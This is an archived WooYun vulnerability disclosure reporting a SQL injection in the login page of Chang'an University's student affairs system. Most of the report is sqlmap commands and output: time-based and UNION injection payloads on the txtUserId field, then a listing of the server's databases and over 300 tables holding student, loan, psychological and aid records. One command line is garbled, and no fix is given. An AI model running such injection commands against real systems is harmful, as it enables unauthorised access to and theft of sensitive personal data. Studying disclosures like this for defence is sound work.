当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140992

漏洞标题:长安大学学生工作管理系统sql注入漏洞(数据库大量数据)

相关厂商:长安大学

漏洞作者: 0error-0warning

提交时间:2015-09-14 12:41

修复时间:2015-10-29 12:56

公开时间:2015-10-29 12:56

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-14: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商已经确认,细节仅向厂商公开
2015-09-24: 细节向核心白帽子及相关领域专家公开
2015-10-04: 细节向普通白帽子公开
2015-10-14: 细节向实习白帽子公开
2015-10-29: 细节向公众公开

简要描述:

存在post注入漏洞,成功注入,可能被利用。

详细说明:

http://**.**.**.**/Login/loginpageforstudentb.aspx


12.jpg


通过Firefox拿到post提交的参数

111.jpg


C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.as
px?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwE
PDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril
4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi
%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY
3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS
4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85
byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C
3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gl
a2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtUserId (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh W
NleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKq
BAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin';WAITFOR DE
LAY '0:0:5'--&txtPwd=admin&Button1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh W
NleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKq
BAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin' UNION ALL
SELECT NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(112) CHAR(113) CHAR(113) CHA
R(65) CHAR(100) CHAR(120) CHAR(106) CHAR(113) CHAR(71) CHAR(108) CHAR(120) CHAR(
109) CHAR(105) CHAR(113) CHAR(113) CHAR(107) CHAR(118) CHAR(113),NULL-- &txtPwd=
admin&Button1=%E7%99%BB %E5%BD%95
---
[23:14:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


存在post注入

C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.as
px?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwE
PDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril
4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi
%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY
3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS
4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85
byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C
3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gl
a2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95" --d
bs
[23:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[23:16:55] [INFO] fetching database names
[23:16:55] [INFO] the SQL query used returns 8 entries
[23:16:55] [INFO] resumed: master
[23:16:55] [INFO] resumed: model
[23:16:55] [INFO] resumed: msdb
[23:16:55] [INFO] resumed: Northwind
[23:16:55] [INFO] resumed: pubs
[23:16:55] [INFO] resumed: StudWork
[23:16:55] [INFO] resumed: tempdb
[23:16:55] [INFO] resumed: 长安大学_学工在线
available databases [8]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWork
[*] tempdb
[*] 长安大学_学工在线


检测出了数据库
随便挑了一个看了一下

C:\Python27\sqlmap>sqlmap.py -px?LogoutURL=%2flogin" --dataPDwUKLTMzNDE0ODA3Mg9kFgICAw9kF4%2FlhYHorrjmnIDlpJrovpPlhaXlr%2Bk2BWFpeiLseaWh%2BWNleW8leW3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU4jeiDveS4uuepugril4%2FlhYHorrjbyPOuS4jeWFgeiuuOi%2Bk%2BWFpei3IyTBvPEM&__EVENTVALIDATION=%2a2ks2iURfMhj%2BEh1&txtUserId=a长安大学_学工在线 --tables
Database: 长安大学_学工在线
[309 tables]
+----------------------------+
| LUMIGENT_PROFILER          |
| VoteList                   |
| Vsign_AgtRegistryFell      |
| Vsign_AgtRegistryFell      |
| Vsign_AgtRegistryOrder     |
| Vdorm_buildingInfo【不用】
| Vdorm_buildingInfo【不用】
| tDorm_User不用
| tEmp_pblDocument?          |
| tEmp_pblEmploymentType?    |
| tEmp_pblFriendlyConnect?   |
| tEmp_pblMessageInfo?       |
| tEmp_pblNewsPic?           |
| tEmp_pblRelTopicMsg?       |
| tEmp_pblTopic?             |
| tEmp_studDepartment(不用,暂
| tEmp_studStudFavorite?     |
| vDorm_OccupiedRoom不用
| dtproperties               |
| sysconstraints             |
| syssegments                |
| tAcc_File                  |
| tCadreGroup_state          |
| tCadre_dimission           |
| tDerate_Temp               |
| tDorm_Bed                  |
| tDorm_Building             |
| tDorm_History              |
| tDorm_RewardHistory        |
| tDorm_Room                 |
| tDorm_RoomType             |
| tEmp_BothMeeting           |
| tEmp_BothMeetingUnit       |
| tEmp_BothMeetingUnitSpec   |
| tEmp_ViewCounter           |
| tEmp_codeComputerLevel     |
| tEmp_codeForeignLanguage   |
| tEmp_codeIdentity          |
| tEmp_codeLiteracyDegree    |
| tEmp_codeMandarin          |
| tEmp_codeUnitEconomyType   |
| tEmp_codeUnitLevel         |
| tEmp_codeUnitSubjection    |
| tEmp_codeUnitTrade         |
| tEmp_codeUnitType          |
| tEmp_codeWageManageType    |
| tEmp_gbRegionalism         |
| tEmp_gbWedlock             |
| tEmp_pblDeptDate           |
| tEmp_pblEmployment         |
| tEmp_pblSpecIntro          |
| tEmp_signAgtRegistry       |
| tEmp_studAcc               |
| tEmp_studFavorite          |
| tEmp_studFocusFromEnt      |
| tEmp_studIntro             |
| tEmp_studTouch             |
| tEmp_unitBaseInfo          |
| tEmp_unitCompanyAcc        |
| tEmp_unitCorpEmploy        |
| tEmp_unitCorpFavorite      |
| tEmp_unitCorpPublicize     |
| tEmp_unitEntrLoginInfo     |
| tEmp_unitFocusFromStudents |
| tFile_Video                |
| tGreen_Apply               |
| tMin_Activity              |
| tMin_InMoney               |
| tMin_OutMoney              |
| tMin_Visit                 |
| tPoor_Student              |
| tPopedom_Atom              |
| tSim_Appraise              |
| tSim_Punish                |
| tSim_Reward                |
| tStudCadre_Info            |
| tStudCadre_Type            |
| tStudCadre_Unit            |
| tStud_AllowApply           |
| tTemp_Apply                |
| tarm_AwardList             |
| tarm_StudCourse            |
| tarm_StudLevy              |
| tarm_StudRecord            |
| tarm_policy                |
| tarrear_enrol              |
| tarrear_ratify             |
| tarrear_repay              |
| tasl_Affirm                |
| tasl_BankAuditing          |
| tasl_BankAuditing          |
| tasl_BankBargain           |
| tasl_Breach                |
| tasl_Compensate            |
| tasl_End                   |
| tasl_Estate                |
| tasl_Extend                |
| tasl_Familial              |
| tasl_Imburse               |
| tasl_LoanType              |
| tasl_Postponed             |
| tasl_SchoolAuditingIdea    |
| tasl_SchoolAuditingIdea    |
| tasl_StudRequisition       |
| tasl_Whither               |
| tbase_Department           |
| tbase_Teacher              |
| tbase_User                 |
| tborrow_enrol              |
| tborrow_ratify             |
| tborrow_repay              |
| tcard_MakeCard             |
| tcgb_Folk                  |
| tcgb_PolityVisage          |
| tcgb_Regionalism           |
| tcgt_AwardGrade            |
| tcgt_AwardList             |
| tcgt_ClassRelation         |
| tcgt_StudCourse            |
| tcgt_StudRecord            |
| tcgt_stdResultCell         |
| tcgt_stdScale              |
| tcmoe_BloodType            |
| tcmoe_Emigrant             |
| tcmoe_PunishType           |
| tcmoe_RewardLevel          |
| tcmoe_RewardType           |
| tcode_Academic             |
| tcode_Aspect               |
| tcode_Degree               |
| tcode_LenOfSchool          |
| tcode_Post                 |
| tcode_PsychologyLevel      |
| tcode_RewardItem           |
| tcode_StudType             |
| tcode_poorType             |
| tcpt_BranchActivity        |
| tcpt_ClassRelation         |
| tcpt_Document              |
| tcpt_MemberStudy           |
| tcpt_PartyActive           |
| tcpt_PartyBranch           |
| tcpt_PartyMember           |
| tcpt_PartyPrep             |
| tcpt_PersonRelation        |
| tcpt_Requisition           |
| tderate_AuditSchooling     |
| tderate_RegSchooling       |
| tdm_ZZMM                   |
| tev_ClassAssess            |
| tev_ClassAssessTemp        |
| tev_EvaluatingItem         |
| tev_EvaluatingType         |
| tev_StudAssess             |
| tev_StudAssessTemp         |
| tgreen_Charge              |
| tgreen_temp                |
| tins_InsCompany            |
| tins_InsGrade              |
| tins_InsItem               |
| tins_InsPayForMoney        |
| tins_InsRegStudent         |
| titem_DeregType            |
| titem_PartyBranchType      |
| titem_PartyMemberType      |
| titem_PartySchoolType      |
| tlv_Procedure              |
| tlv_RegForAbnormity        |
| tlv_RegForGraduate         |
| tlv_Schema                 |
| tmem_BookEnrol             |
| tmem_ChooseCadre           |
| tmem_DevelopmentNum        |
| tmem_DevelopmentNum        |
| tmem_MemBerDocment         |
| tmem_MemBerDocment         |
| tmem_MemCharge             |
| tmem_OrgType               |
| tmem_PartyNum              |
| tmem_PartyNum              |
| tmem_Record                |
| tmem_Rewards               |
| tmem_TrainDepartment       |
| tmem_TrainManInfo          |
| tmem_orgMan                |
| tmem_organization          |
| tmema_ActivityApply        |
| tmema_ActivityAudit        |
| tmema_ActivityField        |
| tmema_AssnJob              |
| tmema_AssnMember           |
| tmemp_Activity             |
| tmemp_ComAuthor            |
| tmemp_ComManuscript        |
| tmemp_ComReport            |
| tmemp_PublicationIssue     |
| tmemp_PulicJob             |
| tpbl_SpecIntro             |
| tpoor_poorStudent          |
| tpopedom_UserBackManage    |
| tpopedom_UserModule        |
| tpsy_BBSMain               |
| tpsy_BBSRestore            |
| tpsy_Dossier               |
| tpsy_Emphases              |
| tpsy_Preengage             |
| tpsy_Talk                  |
| tpsy_Work                  |
| tpunish_Information        |
| tpunish_Repeal             |
| treward_Information        |
| treward_Repeal             |
| treward_Type               |
| tschol_Annotion            |
| tschol_Apply               |
| tschol_Classify            |
| tschol_Quotas              |
| tschol_RankObj             |
| tstipend_Annotion          |
| tstipend_Apply             |
| tstipend_Classify          |
| tstipend_Quotas            |
| tstipend_RankObj           |
| tstud_Educate              |
| tstud_Family               |
| tstud_Graduate             |
| tstud_Member               |
| tstud_Student              |
| tsubsidy_Annotion          |
| tsubsidy_Apply             |
| tsubsidy_Classify          |
| tsubsidy_Quotas            |
| tsubsidy_RankObj           |
| tsys_BackUp                |
| tsys_Download              |
| tsys_EmpNavigation         |
| tsys_FriendlyLink          |
| tsys_Message               |
| tsys_Modules_测试
| tsys_Modules_长安大学
| tsys_NoticeInterface       |
| tsys_NoticeInterface       |
| tsys_NoticeType            |
| tsys_NoticeType长安大学
| tsys_Options               |
| tsys_VoteList              |
| tsys_VoteProject           |
| tsys_VoteRen               |
| tsys_loginLog              |
| tsys_loginSession          |
| twl_WorkLog                |
| twork_Apply                |
| twork_CheckIn              |
| twork_PayMoney             |
| twork_PostObj              |
| twork_PostType             |
| vAloan_ListAff             |
| vAloan_ListBasic           |
| vAloan_ListExtend          |
| vDerate_green_Stat         |
| vDorm_AllRoomDetail        |
| vDorm_Bed                  |
| vDorm_CanBePreared         |
| vDorm_CanUseBed            |
| vDorm_Preared              |
| vDorm_UsedBed              |
| vDorm_room                 |
| vDorm_student


一共三百多个表,内容太丰富,也没有继续研究和尝试下去的兴趣了。就告一段落了。

漏洞证明:

sql注入也是需要耐心和毅力的

修复方案:

版权声明:转载请注明来源 0error-0warning@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-14 12:55

厂商回复:

通知处理中

最新状态:

暂无